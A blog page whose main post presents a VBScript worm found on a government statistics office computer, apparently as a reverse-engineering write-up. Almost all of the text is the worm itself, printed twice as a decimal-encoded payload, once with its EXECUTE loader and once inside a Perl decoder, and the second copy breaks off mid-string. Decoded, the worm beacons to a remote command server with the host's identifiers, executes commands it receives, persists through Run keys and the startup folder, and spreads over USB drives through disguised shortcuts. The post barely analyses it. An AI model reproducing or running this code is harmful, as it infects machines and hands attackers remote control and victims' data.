2013/11/20

Blocking ad sites for privacy and bandwidth :)

I came up with an excellent Idea to start collecting urls that provide ads and block them as they usually are a waste of time and bandwidth and usually are used to collect private data from us. SO I created a project that am going will end in a very nice and easy to use proxy app to be used to control all ads on any device. This is the beginning of a beautiful Era.

The project is here https://github.com/laudarch/AdControlla just in case you want to see or use it also this can be used on any firewall that you currently have until we finish the apps at least :)

2013/05/24

Companies now research on their potential clients

I recently was asked to research on AAA and Billing solution for the company to use in their sudden interest to
deploy wifi hotspots in the city. I turned to verax systems, now ive just logged on to my linked in and theres some verax
on lookers there, WTF?

2013/05/03

servieca.vbs - Reverse Engineered

Hello

So I came across a new virus/worm on one of the Statistical Services(http://www.statsghana.gov.gh)
computers and the have been infected by a guy call njq8(https://twitter.com/njq8)

I don't know this guy but I'll follow his tweets and watch his projects.
anyways here's the breakdown of the process I used.

First the original file.

HOUDINI = "39|60|91|32|99|111|100|101|100|32|98|89|32|110|106|113|56|32|93|62|39|13|10|79|110|32|69|114|114|111|114|32|82|101|115|117|109|101|32|78|101|120|116|13|10|100|105|109|32|115|104|32|39|32|115|104|101|108|108|13|10|115|101|116|32|115|104|32|61|87|83|99|114|105|112|116|46|67|114|101|97|116|101|79|98|106|101|99|116|40|34|87|83|99|114|105|112|116|46|83|104|101|108|108|34|41|13|10|100|105|109|32|102|115|32|39|32|102|105|108|101|115|121|115|116|101|109|13|10|115|101|116|32|102|115|61|32|67|114|101|97|116|101|79|98|106|101|99|116|40|34|83|99|114|105|112|116|105|110|103|46|70|105|108|101|83|121|115|116|101|109|79|98|106|101|99|116|34|41|32|13|10|100|105|109|32|104|111|115|116|13|10|104|111|115|116|61|34|99|117|112|105|100|111|110|46|122|97|112|116|111|46|111|114|103|34|13|10|100|105|109|32|112|111|114|116|13|10|112|111|114|116|61|57|57|57|13|10|100|105|109|32|68|82|13|10|68|82|32|61|32|115|104|46|69|120|112|97|110|100|69|110|118|105|114|111|110|109|101|110|116|83|116|114|105|110|103|115|40|34|37|116|101|109|112|37|34|41|32|38|32|34|92|34|13|10|100|105|109|32|70|78|13|10|70|78|32|61|34|83|101|114|118|105|101|99|97|46|118|98|115|34|13|10|100|105|109|32|102|104|13|10|100|105|109|32|117|115|13|10|117|115|61|34|126|34|13|10|105|110|115|13|10|100|105|109|32|115|112|108|13|10|115|112|108|61|34|106|110|74|110|106|34|13|10|100|105|109|32|105|13|10|105|61|48|13|10|119|104|105|108|101|32|116|114|117|101|13|10|100|105|109|32|97|13|10|97|32|61|32|34|34|13|10|97|61|32|115|112|108|105|116|40|112|111|115|116|40|34|114|101|97|100|121|34|44|34|34|41|44|115|112|108|41|13|10|115|101|108|101|99|116|32|99|97|115|101|32|97|40|48|41|13|10|99|97|115|101|32|34|101|120|99|34|13|10|100|105|109|32|115|97|13|10|115|97|61|32|97|40|49|41|13|10|101|120|101|99|117|116|101|32|115|97|13|10|99|97|115|101|32|34|117|110|115|34|13|10|117|110|115|13|10|101|110|100|32|115|101|108|101|99|116|13|10|119|115|99|114|105|112|116|46|115|108|101|101|112|32|52|48|48|48|13|10|105|32|61|32|105|32|43|32|49|13|10|105|102|32|105|62|32|50|32|116|104|101|110|13|10|105|61|48|13|10|120|105|110|115|13|10|101|110|100|32|105|102|13|10|119|101|110|100|13|10|13|10|102|117|110|99|116|105|111|110|32|105|110|115|13|10|111|110|32|101|114|114|111|114|32|114|101|115|117|109|101|32|110|101|120|116|13|10|117|115|61|32|115|104|46|114|101|103|114|101|97|100|40|34|72|75|67|85|92|110|106|113|56|34|41|13|10|105|102|32|117|115|61|34|126|34|32|116|104|101|110|13|10|105|102|32|108|99|97|115|101|40|32|109|105|100|40|119|115|99|114|105|112|116|46|115|99|114|105|112|116|102|117|108|108|110|97|109|101|44|50|41|41|61|34|58|92|34|32|38|32|32|108|99|97|115|101|40|102|110|41|32|116|104|101|110|13|10|117|115|61|34|121|34|13|10|115|104|46|114|101|103|119|114|105|116|101|32|34|72|75|67|85|92|110|106|113|56|34|44|32|32|117|115|44|32|34|82|69|71|95|83|90|34|13|10|101|108|115|101|13|10|117|115|61|34|110|34|13|10|115|104|46|114|101|103|119|114|105|116|101|32|34|72|75|67|85|92|110|106|113|56|34|44|32|32|117|115|44|32|34|82|69|71|95|83|90|34|13|10|101|110|100|32|105|102|13|10|101|110|100|32|105|102|13|10|69|114|114|46|67|108|101|97|114|13|10|102|115|46|67|111|112|121|70|105|108|101|32|119|115|99|114|105|112|116|46|115|99|114|105|112|116|102|117|108|108|110|97|109|101|44|100|114|32|38|32|102|110|32|44|116|114|117|101|13|10|115|101|116|32|102|104|32|61|32|102|115|46|79|112|101|110|84|101|120|116|70|105|108|101|40|32|100|114|32|38|32|102|110|44|32|56|44|32|102|97|108|115|101|41|13|10|105|102|32|32|69|114|114|46|78|117|109|98|101|114|62|48|32|116|104|101|110|13|10|119|115|99|114|105|112|116|46|113|117|105|116|13|10|101|110|100|32|105|102|13|10|120|105|110|115|13|10|101|110|100|32|102|117|110|99|116|105|111|110|13|10|13|10|115|117|98|32|120|105|110|115|13|10|111|110|32|101|114|114|111|114|32|114|101|115|117|109|101|32|110|101|120|116|13|10|115|104|46|114|101|103|119|114|105|116|101|32|34|72|75|67|85|92|83|111|102|116|119|97|114|101|92|77|105|99|114|111|115|111|102|116|92|87|105|110|100|111|119|115|92|67|117|114|114|101|110|116|86|101|114|115|105|111|110|92|82|117|110|92|34|32|38|32|102|110|44|32|32|99|104|114|119|40|51|52|41|32|38|32|100|114|32|38|32|102|110|32|38|32|99|104|114|119|40|51|52|41|44|32|34|82|69|71|95|83|90|34|13|10|115|104|46|114|101|103|119|114|105|116|101|32|34|72|75|76|77|92|83|111|102|116|119|97|114|101|92|77|105|99|114|111|115|111|102|116|92|87|105|110|100|111|119|115|92|67|117|114|114|101|110|116|86|101|114|115|105|111|110|92|82|117|110|92|34|32|38|32|102|110|44|32|32|99|104|114|119|40|51|52|41|32|38|32|100|114|32|38|32|102|110|32|38|32|99|104|114|119|40|51|52|41|44|32|34|82|69|71|95|83|90|34|13|10|102|115|46|99|111|112|121|102|105|108|101|32|119|115|99|114|105|112|116|46|115|99|114|105|112|116|102|117|108|108|110|97|109|101|44|32|32|67|114|101|97|116|101|79|98|106|101|99|116|40|34|83|104|101|108|108|46|65|112|112|108|105|99|97|116|105|111|110|34|41|46|78|97|109|101|83|112|97|99|101|40|38|72|55|41|46|83|101|108|102|46|80|97|116|104|32|38|34|92|34|32|38|32|102|110|32|44|116|114|117|101|13|10|102|111|114|32|101|97|99|104|32|120|120|32|105|110|32|102|115|46|68|114|105|118|101|115|13|10|105|102|32|120|120|46|105|115|114|101|97|100|121|32|116|104|101|110|13|10|105|102|32|120|120|46|70|114|101|101|83|112|97|99|101|32|62|48|32|116|104|101|110|13|10|105|102|32|120|120|46|100|114|105|118|101|116|121|112|101|61|49|32|116|104|101|110|13|10|105|102|32|102|115|46|102|105|108|101|101|120|105|115|116|115|40|120|120|46|112|97|116|104|32|38|32|34|92|34|32|38|32|102|110|41|32|116|104|101|110|13|10|102|115|46|103|101|116|102|105|108|101|40|120|120|46|112|97|116|104|32|38|32|34|92|34|32|32|38|32|102|110|41|46|65|116|116|114|105|98|117|116|101|115|61|48|13|10|101|110|100|32|105|102|13|10|102|115|46|99|111|112|121|102|105|108|101|32|100|114|32|38|32|102|110|32|44|32|120|120|46|112|97|116|104|32|38|32|34|92|34|32|32|38|32|102|110|44|116|114|117|101|13|10|70|111|114|32|69|97|99|104|32|120|32|73|110|32|102|115|46|71|101|116|70|111|108|100|101|114|40|32|120|120|46|112|97|116|104|32|38|32|34|92|34|32|41|46|70|105|108|101|115|13|10|119|115|99|114|105|112|116|46|115|108|101|101|112|32|49|13|10|105|102|32|105|110|115|116|114|40|120|46|110|97|109|101|44|34|46|34|41|32|116|104|101|110|13|10|105|102|32|108|99|97|115|101|40|32|83|112|108|105|116|40|120|46|110|97|109|101|44|32|34|46|34|41|40|85|66|111|117|110|100|40|83|112|108|105|116|40|120|46|110|97|109|101|44|32|34|46|34|41|41|41|41|60|62|34|108|110|107|34|32|116|104|101|110|13|10|120|46|65|116|116|114|105|98|117|116|101|115|32|61|32|50|13|10|105|102|32|117|99|97|115|101|40|120|46|110|97|109|101|41|32|60|62|32|117|99|97|115|101|40|102|110|41|32|116|104|101|110|13|10|87|105|116|104|32|115|104|46|67|114|101|97|116|101|83|104|111|114|116|99|117|116|40|120|120|46|112|97|116|104|32|38|32|34|92|34|32|32|38|32|120|46|110|97|109|101|32|38|32|34|46|108|110|107|34|41|32|13|10|46|84|97|114|103|101|116|80|97|116|104|32|61|32|34|99|109|100|46|101|120|101|34|13|10|46|87|111|114|107|105|110|103|68|105|114|101|99|116|111|114|121|32|61|32|34|34|13|10|46|65|114|103|117|109|101|110|116|115|32|61|32|34|47|99|32|115|116|97|114|116|32|34|32|38|32|82|101|112|108|97|99|101|40|102|110|44|34|32|34|44|32|67|104|114|87|40|51|52|41|32|95|13|10|38|32|34|32|34|32|38|32|67|104|114|87|40|51|52|41|41|32|38|32|34|38|115|116|97|114|116|32|34|32|38|32|114|101|112|108|97|99|101|40|32|120|46|110|97|109|101|44|34|32|34|44|32|67|104|114|87|40|51|52|41|32|38|32|34|32|34|32|38|32|67|104|114|87|40|51|52|41|41|32|38|32|34|32|38|32|101|120|105|116|34|13|10|46|73|99|111|110|76|111|99|97|116|105|111|110|32|61|32|115|104|46|114|101|103|114|101|97|100|40|34|72|75|76|77|92|83|79|70|84|87|65|82|69|92|67|108|97|115|115|101|115|92|34|32|38|32|115|104|46|114|101|103|114|101|97|100|40|34|72|75|76|77|92|83|79|70|84|87|65|82|69|92|67|108|97|115|115|101|115|92|46|34|32|38|32|83|112|108|105|116|40|120|46|110|97|109|101|44|32|34|46|34|41|40|85|66|111|117|110|100|40|83|112|108|105|116|40|120|46|110|97|109|101|44|32|34|46|34|41|41|41|32|38|32|34|92|34|41|32|38|32|34|92|68|101|102|97|117|108|116|73|99|111|110|92|34|41|13|10|105|102|32|105|110|115|116|114|40|32|46|105|99|111|110|108|111|99|97|116|105|111|110|44|34|44|34|41|61|48|32|116|104|101|110|13|10|46|105|99|111|110|108|111|99|97|116|105|111|110|32|61|32|46|105|99|111|110|108|111|99|97|116|105|111|110|32|38|34|44|48|34|13|10|101|110|100|32|105|102|13|10|46|83|97|118|101|40|41|13|10|101|110|100|32|119|105|116|104|13|10|101|110|100|32|105|102|13|10|101|110|100|32|105|102|13|10|101|110|100|32|105|102|13|10|78|101|120|116|13|10|101|110|100|32|105|102|13|10|101|110|100|32|105|102|13|10|101|110|100|32|105|102|13|10|110|101|120|116|13|10|69|114|114|46|67|108|101|97|114|13|10|101|110|100|32|115|117|98|13|10|13|10|102|117|110|99|116|105|111|110|32|117|110|115|13|10|111|110|32|101|114|114|111|114|32|114|101|115|117|109|101|32|110|101|120|116|13|10|102|104|46|99|108|111|115|101|13|10|115|104|46|82|101|103|68|101|108|101|116|101|32|34|72|75|67|85|92|83|111|102|116|119|97|114|101|92|77|105|99|114|111|115|111|102|116|92|87|105|110|100|111|119|115|92|67|117|114|114|101|110|116|86|101|114|115|105|111|110|92|82|117|110|92|34|32|38|32|102|110|13|10|115|104|46|82|101|103|68|101|108|101|116|101|32|34|72|75|76|77|92|83|111|102|116|119|97|114|101|92|77|105|99|114|111|115|111|102|116|92|87|105|110|100|111|119|115|92|67|117|114|114|101|110|116|86|101|114|115|105|111|110|92|82|117|110|92|34|32|38|32|102|110|13|10|102|115|46|68|101|108|101|116|101|70|105|108|101|32|100|114|32|38|32|102|110|32|44|116|114|117|101|13|10|102|115|46|68|101|108|101|116|101|70|105|108|101|32|67|114|101|97|116|101|79|98|106|101|99|116|40|34|83|104|101|108|108|46|65|112|112|108|105|99|97|116|105|111|110|34|41|46|78|97|109|101|83|112|97|99|101|40|38|72|55|41|46|83|101|108|102|46|80|97|116|104|32|38|34|92|34|32|38|32|102|110|32|44|116|114|117|101|13|10|102|111|114|32|101|97|99|104|32|120|120|32|105|110|32|102|115|46|68|114|105|118|101|115|13|10|105|102|32|120|120|46|105|115|114|101|97|100|121|32|116|104|101|110|13|10|105|102|32|120|120|46|70|114|101|101|83|112|97|99|101|32|62|48|32|116|104|101|110|13|10|70|111|114|32|69|97|99|104|32|120|32|73|110|32|102|115|46|71|101|116|70|111|108|100|101|114|40|32|120|120|46|112|97|116|104|32|38|32|34|92|34|41|46|70|105|108|101|115|13|10|79|110|32|69|114|114|111|114|32|82|101|115|117|109|101|32|78|101|120|116|13|10|105|102|32|105|110|115|116|114|40|120|46|110|97|109|101|44|34|46|34|41|32|116|104|101|110|13|10|105|102|32|108|99|97|115|101|40|32|83|112|108|105|116|40|120|46|110|97|109|101|44|32|34|46|34|41|40|85|66|111|117|110|100|40|83|112|108|105|116|40|120|46|110|97|109|101|44|32|34|46|34|41|41|41|41|60|62|34|108|110|107|34|32|116|104|101|110|13|10|120|46|65|116|116|114|105|98|117|116|101|115|32|61|32|48|13|10|105|102|32|117|99|97|115|101|40|120|46|110|97|109|101|41|32|60|62|32|117|99|97|115|101|40|102|110|41|32|116|104|101|110|13|10|102|115|46|100|101|108|101|116|101|102|105|108|101|40|120|120|46|112|97|116|104|32|38|32|34|92|34|32|38|32|120|46|110|97|109|101|32|38|32|34|46|108|110|107|34|32|41|13|10|101|108|115|101|13|10|102|115|46|100|101|108|101|116|101|102|105|108|101|40|32|120|120|46|112|97|116|104|32|38|32|34|92|34|32|38|32|120|46|110|97|109|101|32|41|13|10|101|110|100|32|105|102|13|10|101|110|100|32|105|102|13|10|101|110|100|32|105|102|13|10|78|101|120|116|13|10|101|110|100|32|105|102|13|10|101|110|100|32|105|102|13|10|110|101|120|116|13|10|119|115|99|114|105|112|116|46|113|117|105|116|13|10|101|110|100|32|102|117|110|99|116|105|111|110|13|10|13|10|102|117|110|99|116|105|111|110|32|112|111|115|116|40|99|109|100|32|44|100|97|41|13|10|112|111|115|116|61|34|34|13|10|68|105|109|32|111|13|10|83|101|116|32|111|32|61|32|67|114|101|97|116|101|79|98|106|101|99|116|40|34|77|83|88|77|76|50|46|88|77|76|72|84|84|80|34|41|13|10|111|46|111|112|101|110|32|34|80|79|83|84|34|44|34|104|116|116|112|58|47|47|34|32|38|32|104|111|115|116|32|38|32|34|58|34|32|38|32|112|111|114|116|32|38|34|47|34|32|38|32|99|109|100|44|32|102|97|108|115|101|13|10|111|46|115|101|116|82|101|113|117|101|115|116|72|101|97|100|101|114|32|34|85|115|101|114|45|65|103|101|110|116|58|34|44|32|32|105|110|102|13|10|111|46|115|101|110|100|32|100|97|13|10|112|111|115|116|61|111|46|114|101|115|112|111|110|115|101|84|101|120|116|13|10|101|110|100|32|102|117|110|99|116|105|111|110|13|10|13|10|100|105|109|32|120|105|110|102|13|10|102|117|110|99|116|105|111|110|32|105|110|102|13|10|111|110|32|101|114|114|111|114|32|114|101|115|117|109|101|32|110|101|120|116|13|10|105|102|32|120|105|110|102|61|34|34|32|116|104|101|110|13|10|100|105|109|32|115|13|10|115|61|34|63|63|34|13|10|115|32|61|32|104|119|100|13|10|105|110|102|32|61|32|105|110|102|32|38|32|115|32|38|32|34|92|34|13|10|115|61|34|63|63|34|13|10|115|61|32|115|104|46|69|120|112|97|110|100|69|110|118|105|114|111|110|109|101|110|116|83|116|114|105|110|103|115|40|34|37|67|79|77|80|85|84|69|82|78|65|77|69|37|34|41|13|10|105|110|102|32|61|32|105|110|102|32|38|32|115|32|38|32|34|92|34|13|10|115|61|34|63|63|34|13|10|115|61|32|115|104|46|69|120|112|97|110|100|69|110|118|105|114|111|110|109|101|110|116|83|116|114|105|110|103|115|40|34|37|85|83|69|82|78|65|77|69|37|34|41|13|10|105|110|102|32|61|32|105|110|102|32|38|32|115|32|38|32|34|92|34|13|10|115|61|34|63|63|34|13|10|83|101|116|32|97|32|61|32|71|101|116|79|98|106|101|99|116|40|34|119|105|110|109|103|109|116|115|58|123|105|109|112|101|114|115|111|110|97|116|105|111|110|76|101|118|101|108|61|105|109|112|101|114|115|111|110|97|116|101|125|33|92|92|46|92|114|111|111|116|92|99|105|109|118|50|34|41|13|10|83|101|116|32|97|97|32|61|32|97|46|69|120|101|99|81|117|101|114|121|32|40|34|83|101|108|101|99|116|32|42|32|102|114|111|109|32|87|105|110|51|50|95|79|112|101|114|97|116|105|110|103|83|121|115|116|101|109|34|41|13|10|70|111|114|32|69|97|99|104|32|97|97|97|32|105|110|32|97|97|13|10|115|61|32|97|97|97|46|67|97|112|116|105|111|110|32|32|13|10|101|120|105|116|32|102|111|114|13|10|78|101|120|116|13|10|105|110|102|32|61|32|105|110|102|32|38|32|115|32|38|32|34|92|48|46|51|92|34|32|38|32|112|105|100|32|32|13|10|120|105|110|102|61|105|110|102|13|10|101|108|115|101|13|10|105|110|102|61|120|105|110|102|13|10|101|110|100|32|105|102|13|10|101|110|100|32|102|117|110|99|116|105|111|110|13|10|13|10|102|117|110|99|116|105|111|110|32|72|87|68|13|10|83|101|116|32|97|32|61|32|71|101|116|79|98|106|101|99|116|40|34|119|105|110|109|103|109|116|115|58|123|105|109|112|101|114|115|111|110|97|116|105|111|110|76|101|118|101|108|61|105|109|112|101|114|115|111|110|97|116|101|125|33|92|92|46|92|114|111|111|116|92|99|105|109|118|50|34|41|13|10|83|101|116|32|97|97|32|61|32|97|46|69|120|101|99|81|117|101|114|121|40|34|83|69|76|69|67|84|32|42|32|70|82|79|77|32|87|105|110|51|50|95|76|111|103|105|99|97|108|68|105|115|107|34|41|13|10|70|111|114|32|69|97|99|104|32|97|97|97|32|73|110|32|97|97|13|10|105|102|32|97|97|97|46|86|111|108|117|109|101|83|101|114|105|97|108|78|117|109|98|101|114|60|62|34|34|32|116|104|101|110|13|10|72|87|68|61|32|97|97|97|46|86|111|108|117|109|101|83|101|114|105|97|108|78|117|109|98|101|114|13|10|101|120|105|116|32|102|111|114|13|10|101|110|100|32|105|102|13|10|78|101|120|116|13|10|101|110|100|32|102|117|110|99|116|105|111|110|13|10|13|10|70|117|110|99|116|105|111|110|32|80|73|68|13|10|80|73|68|61|48|13|10|111|110|32|101|114|114|111|114|32|114|101|115|117|109|101|32|110|101|120|116|13|10|80|73|68|32|61|32|71|101|116|79|98|106|101|99|116|40|34|119|105|110|109|103|109|116|115|58|114|111|111|116|92|99|105|109|118|50|34|41|46|71|101|116|40|34|87|105|110|51|50|95|34|32|38|95|13|10|34|80|114|111|99|101|115|115|46|72|97|110|100|108|101|61|39|34|32|38|32|95|13|10|115|104|46|69|120|101|99|40|34|109|115|104|116|97|46|101|120|101|34|41|46|80|114|111|99|101|115|115|73|68|32|38|32|34|39|34|41|46|80|97|114|101|110|116|80|114|111|99|101|115|115|73|100|13|10|69|110|100|32|70|117|110|99|116|105|111|110|"
HOUDINI = SPLIT(HOUDINI,"|")
FOR I = 0 TO UBOUND(HOUDINI) -1
NJ = NJ & CHR(HOUDINI(I))
NEXT
EXECUTE (NJ)

Well from that we all know the en/decryption is thesame routine
FOR I = 0 TO UBOUND(HOUDINI) -1
NJ = NJ & CHR(HOUDINI(I))
NEXT

so here's my reverse script in perl:

#!/usr/bin/perl

$HOUDINI = "39|60|91|32|99|111|100|101|100|32|98|89|32|110|106|113|56|32|93|62|39|13|10|79|110|32|69|114|114|111|114|32|82|101|115|117|109|101|32|78|101|120|116|13|10|100|105|109|32|115|104|32|39|32|115|104|101|108|108|13|10|115|101|116|32|115|104|32|61|87|83|99|114|105|112|116|46|67|114|101|97|116|101|79|98|106|101|99|116|40|34|87|83|99|114|105|112|116|46|83|104|101|108|108|34|41|13|10|100|105|109|32|102|115|32|39|32|102|105|108|101|115|121|115|116|101|109|13|10|115|101|116|32|102|115|61|32|67|114|101|97|116|101|79|98|106|101|99|116|40|34|83|99|114|105|112|116|105|110|103|46|70|105|108|101|83|121|115|116|101|109|79|98|106|101|99|116|34|41|32|13|10|100|105|109|32|104|111|115|116|13|10|104|111|115|116|61|34|99|117|112|105|100|111|110|46|122|97|112|116|111|46|111|114|103|34|13|10|100|105|109|32|112|111|114|116|13|10|112|111|114|116|61|57|57|57|13|10|100|105|109|32|68|82|13|10|68|82|32|61|32|115|104|46|69|120|112|97|110|100|69|110|118|105|114|111|110|109|101|110|116|83|116|114|105|110|103|115|40|34|37|116|101|109|112|37|34|41|32|38|32|34|92|34|13|10|100|105|109|32|70|78|13|10|70|78|32|61|34|83|101|114|118|105|101|99|97|46|118|98|115|34|13|10|100|105|109|32|102|104|13|10|100|105|109|32|117|115|13|10|117|115|61|34|126|34|13|10|105|110|115|13|10|100|105|109|32|115|112|108|13|10|115|112|108|61|34|106|110|74|110|106|34|13|10|100|105|109|32|105|13|10|105|61|48|13|10|119|104|105|108|101|32|116|114|117|101|13|10|100|105|109|32|97|13|10|97|32|61|32|34|34|13|10|97|61|32|115|112|108|105|116|40|112|111|115|116|40|34|114|101|97|100|121|34|44|34|34|41|44|115|112|108|41|13|10|115|101|108|101|99|116|32|99|97|115|101|32|97|40|48|41|13|10|99|97|115|101|32|34|101|120|99|34|13|10|100|105|109|32|115|97|13|10|115|97|61|32|97|40|49|41|13|10|101|120|101|99|117|116|101|32|115|97|13|10|99|97|115|101|32|34|117|110|115|34|13|10|117|110|115|13|10|101|110|100|32|115|101|108|101|99|116|13|10|119|115|99|114|105|112|116|46|115|108|101|101|112|32|52|48|48|48|13|10|105|32|61|32|105|32|43|32|49|13|10|105|102|32|105|62|32|50|32|116|104|101|110|13|10|105|61|48|13|10|120|105|110|115|13|10|101|110|100|32|105|102|13|10|119|101|110|100|13|10|13|10|102|117|110|99|116|105|111|110|32|105|110|115|13|10|111|110|32|101|114|114|111|114|32|114|101|115|117|109|101|32|110|101|120|116|13|10|117|115|61|32|115|104|46|114|101|103|114|101|97|100|40|34|72|75|67|85|92|110|106|113|56|34|41|13|10|105|102|32|117|115|61|34|126|34|32|116|104|101|110|13|10|105|102|32|108|99|97|115|101|40|32|109|105|100|40|119|115|99|114|105|112|116|46|115|99|114|105|112|116|102|117|108|108|110|97|109|101|44|50|41|41|61|34|58|92|34|32|38|32|32|108|99|97|115|101|40|102|110|41|32|116|104|101|110|13|10|117|115|61|34|121|34|13|10|115|104|46|114|101|103|119|114|105|116|101|32|34|72|75|67|85|92|110|106|113|56|34|44|32|32|117|115|44|32|34|82|69|71|95|83|90|34|13|10|101|108|115|101|13|10|117|115|61|34|110|34|13|10|115|104|46|114|101|103|119|114|105|116|101|32|34|72|75|67|85|92|110|106|113|56|34|44|32|32|117|115|44|32|34|82|69|71|95|83|90|34|13|10|101|110|100|32|105|102|13|10|101|110|100|32|105|102|13|10|69|114|114|46|67|108|101|97|114|13|10|102|115|46|67|111|112|121|70|105|108|101|32|119|115|99|114|105|112|116|46|115|99|114|105|112|116|102|117|108|108|110|97|109|101|44|100|114|32|38|32|102|110|32|44|116|114|117|101|13|10|115|101|116|32|102|104|32|61|32|102|115|46|79|112|101|110|84|101|120|116|70|105|108|101|40|32|100|114|32|38|32|102|110|44|32|56|44|32|102|97|108|115|101|41|13|10|105|102|32|32|69|114|114|46|78|117|109|98|101|114|62|48|32|116|104|101|110|13|10|119|115|99|114|105|112|116|46|113|117|105|116|13|10|101|110|100|32|105|102|13|10|120|105|110|115|13|10|101|110|100|32|102|117|110|99|116|105|111|110|13|10|13|10|115|117|98|32|120|105|110|115|13|10|111|110|32|101|114|114|111|114|32|114|101|115|117|109|101|32|110|101|120|116|13|10|115|104|46|114|101|103|119|114|105|116|101|32|34|72|75|67|85|92|83|111|102|116|119|97|114|101|92|77|105|99|114|111|115|111|102|116|92|87|105|110|100|111|119|115|92|67|117|114|114|101|110|116|86|101|114|115|105|111|110|92|82|117|110|92|34|32|38|32|102|110|44|32|32|99|104|114|119|40|51|52|41|32|38|32|100|114|32|38|32|102|110|32|38|32|99|104|114|119|40|51|52|41|44|32|34|82|69|71|95|83|90|34|13|10|115|104|46|114|101|103|119|114|105|116|101|32|34|72|75|76|77|92|83|111|102|116|119|97|114|101|92|77|105|99|114|111|115|111|102|116|92|87|105|110|100|111|119|115|92|67|117|114|114|101|110|116|86|101|114|115|105|111|110|92|82|117|110|92|34|32|38|32|102|110|44|32|32|99|104|114|119|40|51|52|41|32|38|32|100|114|32|38|32|102|110|32|38|32|99|104|114|119|40|51|52|41|44|32|34|82|69|71|95|83|90|34|13|10|102|115|46|99|111|112|121|102|105|108|101|32|119|115|99|114|105|112|116|46|115|99|114|105|112|116|102|117|108|108|110|97|109|101|44|32|32|67|114|101|97|116|101|79|98|106|101|99|116|40|34|83|104|101|108|108|46|65|112|112|108|105|99|97|116|105|111|110|34|41|46|78|97|109|101|83|112|97|99|101|40|38|72|55|41|46|83|101|108|102|46|80|97|116|104|32|38|34|92|34|32|38|32|102|110|32|44|116|114|117|101|13|10|102|111|114|32|101|97|99|104|32|120|120|32|105|110|32|102|115|46|68|114|105|118|101|115|13|10|105|102|32|120|120|46|105|115|114|101|97|100|121|32|116|104|101|110|13|10|105|102|32|120|120|46|70|114|101|101|83|112|97|99|101|32|62|48|32|116|104|101|110|13|10|105|102|32|120|120|46|100|114|105|118|101|116|121|112|101|61|49|32|116|104|101|110|13|10|105|102|32|102|115|46|102|105|108|101|101|120|105|115|116|115|40|120|120|46|112|97|116|104|32|38|32|34|92|34|32|38|32|102|110|41|32|116|104|101|110|13|10|102|115|46|103|101|116|102|105|108|101|40|120|120|46|112|97|116|104|32|38|32|34|92|34|32|32|38|32|102|110|41|46|65|116|116|114|105|98|117|116|101|115|61|48|13|10|101|110|100|32|105|102|13|10|102|115|46|99|111|112|121|102|105|108|101|32|100|114|32|38|32|102|110|32|44|32|120|120|46|112|97|116|104|32|38|32|34|92|34|32|32|38|32|102|110|44|116|114|117|101|13|10|70|111|114|32|69|97|99|104|32|120|32|73|110|32|102|115|46|71|101|116|70|111|108|100|101|114|40|32|120|120|46|112|97|116|104|32|38|32|34|92|34|32|41|46|70|105|108|101|115|13|10|119|115|99|114|105|112|116|46|115|108|101|101|112|32|49|13|10|105|102|32|105|110|115|116|114|40|120|46|110|97|109|101|44|34|46|34|41|32|116|104|101|110|13|10|105|102|32|108|99|97|115|101|40|32|83|112|108|105|116|40|120|46|110|97|109|101|44|32|34|46|34|41|40|85|66|111|117|110|100|40|83|112|108|105|116|40|120|46|110|97|109|101|44|32|34|46|34|41|41|41|41|60|62|34|108|110|107|34|32|116|104|101|110|13|10|120|46|65|116|116|114|105|98|117|116|101|115|32|61|32|50|13|10|105|102|32|117|99|97|115|101|40|120|46|110|97|109|101|41|32|60|62|32|117|99|97|115|101|40|102|110|41|32|116|104|101|110|13|10|87|105|116|104|32|115|104|46|67|114|101|97|116|101|83|104|111|114|116|99|117|116|40|120|120|46|112|97|116|104|32|38|32|34|92|34|32|32|38|32|120|46|110|97|109|101|32|38|32|34|46|108|110|107|34|41|32|13|10|46|84|97|114|103|101|116|80|97|116|104|32|61|32|34|99|109|100|46|101|120|101|34|13|10|46|87|111|114|107|105|110|103|68|105|114|101|99|116|111|114|121|32|61|32|34|34|13|10|46|65|114|103|117|109|101|110|116|115|32|61|32|34|47|99|32|115|116|97|114|116|32|34|32|38|32|82|101|112|108|97|99|101|40|102|110|44|34|32|34|44|32|67|104|114|87|40|51|52|41|32|95|13|10|38|32|34|32|34|32|38|32|67|104|114|87|40|51|52|41|41|32|38|32|34|38|115|116|97|114|116|32|34|32|38|32|114|101|112|108|97|99|101|40|32|120|46|110|97|109|101|44|34|32|34|44|32|67|104|114|87|40|51|52|41|32|38|32|34|32|34|32|38|32|67|104|114|87|40|51|52|41|41|32|38|32|34|32|38|32|101|120|105|116|34|13|10|46|73|99|111|110|76|111|99|97|116|105|111|110|32|61|32|115|104|46|114|101|103|114|101|97|100|40|34|72|75|76|77|92|83|79|70|84|87|65|82|69|92|67|108|97|115|115|101|115|92|34|32|38|32|115|104|46|114|101|103|114|101|97|100|40|34|72|75|76|77|92|83|79|70|84|87|65|82|69|92|67|108|97|115|115|101|115|92|46|34|32|38|32|83|112|108|105|116|40|120|46|110|97|109|101|44|32|34|46|34|41|40|85|66|111|117|110|100|40|83|112|108|105|116|40|120|46|110|97|109|101|44|32|34|46|34|41|41|41|32|38|32|34|92|34|41|32|38|32|34|92|68|101|102|97|117|108|116|73|99|111|110|92|34|41|13|10|105|102|32|105|110|115|116|114|40|32|46|105|99|111|110|108|111|99|97|116|105|111|110|44|34|44|34|41|61|48|32|116|104|101|110|13|10|46|105|99|111|110|108|111|99|97|116|105|111|110|32|61|32|46|105|99|111|110|108|111|99|97|116|105|111|110|32|38|34|44|48|34|13|10|101|110|100|32|105|102|13|10|46|83|97|118|101|40|41|13|10|101|110|100|32|119|105|116|104|13|10|101|110|100|32|105|102|13|10|101|110|100|32|105|102|13|10|101|110|100|32|105|102|13|10|78|101|120|116|13|10|101|110|100|32|105|102|13|10|101|110|100|32|105|102|13|10|101|110|100|32|105|102|13|10|110|101|120|116|13|10|69|114|114|46|67|108|101|97|114|13|10|101|110|100|32|115|117|98|13|10|13|10|102|117|110|99|116|105|111|110|32|117|110|115|13|10|111|110|32|101|114|114|111|114|32|114|101|115|117|109|101|32|110|101|120|116|13|10|102|104|46|99|108|111|115|101|13|10|115|104|46|82|101|103|68|101|108|101|116|101|32|34|72|75|67|85|92|83|111|102|116|119|97|114|101|92|77|105|99|114|111|115|111|102|116|92|87|105|110|100|111|119|115|92|67|117|114|114|101|110|116|86|101|114|115|105|111|110|92|82|117|110|92|34|32|38|32|102|110|13|10|115|104|46|82|101|103|68|101|108|101|116|101|32|34|72|75|76|77|92|83|111|102|116|119|97|114|101|92|77|105|99|114|111|115|111|102|116|92|87|105|110|100|111|119|115|92|67|117|114|114|101|110|116|86|101|114|115|105|111|110|92|8